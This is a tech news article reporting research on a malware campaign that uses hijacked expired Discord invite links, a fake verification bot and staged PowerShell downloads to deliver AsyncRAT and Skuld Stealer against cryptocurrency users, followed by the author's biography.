Hackers are hijacking expired Discord invite links to trick users into malware infections that steal crypto wallets and bypass browser security tools.

According to CheckPoint research team, cybercriminals are using expired Discord invite links to lead users toward malicious servers that result in advanced malware infections.

Attackers hijack former invite links, which belonged to trusted communities, to send users toward imitation Discord servers. The fake Discord servers trick their users into downloading dangerous malware, including AsyncRAT and Skuld Stealer, cryptocurrency wallet-targeting malware.

The attackers exploit how Discord generates invite links by using both temporary and permanent linking capabilities. Attackers gain access to abandoned links by claiming them back to set harmful Discord servers.

In this way, users who click on what appears to be valid invitations from social media or outdated posts are automatically taken to malicious servers controlled by hackers.

Inside these fake servers, users encounter a bot called “Safeguard” that presents a fake verification process. After users initiate the verification process, they access a phishing website, which runs a dangerous PowerShell command.

The command retrieves malicious software from GitHub, as well as Bitbucket and Pastebin platforms, in order to make the operation blend in with standard web traffic.

The malware executes multiple stages to evade detection systems. A GitHub link serves as the first download target for a PowerShell script. The loader retrieves the encrypted malware from Bitbucket before decrypting it for installation on the user’s computer system.

The last payloads—AsyncRAT and Skuld Stealer—enable attackers to remotely control systems and steal important information, including user credentials, together with crypto wallet details from Exodus and Atomic applications. The malware implements timed delays, up to 15 minutes, to evade automated security systems.

Additionally, the cyberattackers discovered a method to circumvent the protection provided by Google Chrome’s App Bound Encryption for cookies. The attackers modified ChromeKatz to enable direct extraction of login cookies from Chrome, Edge, and Brave browser memory.

The attacks have targeted users throughout the United States, along with Vietnam, France, and Germany, as well as additional nations. The attackers seem to target cryptocurrency users because their malware specifically targets wallet credentials and recovery phrases.

The researchers believe cybercriminals will develop new methods despite Discord disabling the specific bot used in this campaign. Users should protect themselves from such attacks by avoiding outdated Discord invites, while being cautious about verification requests and maintaining current antivirus software.

Hi, I’m Kiara Fabbri a Tech News Writer at WizCase. I'm a multimedia journalist with a keen interest in innovative and immersive news storytelling. Fluent in three languages—Italian, English, and Spanish—I'm deeply engaged in all facets of news reporting. I am currently undertaking a Ph.D. exploring VR applications in journalism. Following my studies in psychology (BSc) and political psychology (MSc), I embarked on a three-year journey across South America. During this time, I undertook a 4000 km solo bicycle trip from Chile to Brazil. There, I camped, cooked on the road, and volunteered in various facilities. It was during these travels that I discovered my passion for journalism. Subsequently, I pursued a Master's program in journalism innovation and enterprise. My career in journalism has seen me produce VR immersive experiences covering a range of topics. These include documenting an Anti Militaristic raid of a NATO Base, life in the Brazilian Favelas, the recent violent protest clashes in Buenos Aires and finally social projects run by Skaters in the Argentinian ghettos. In addition to my journalistic endeavours, I also practice parkour, a discipline I have cultivated over several years now. I love to make the most of this skill in my journalistic style; for example, it has enabled me to capture dynamic footage from heights during the recent violent clashes in Buenos Aires. There, I scaled heights and employed a long stick on my camera to create aerial 360° views. Through my dedication to pushing the boundaries of journalism, I am committed to amplifying voices, sparking meaningful conversations, and driving positive change in the world.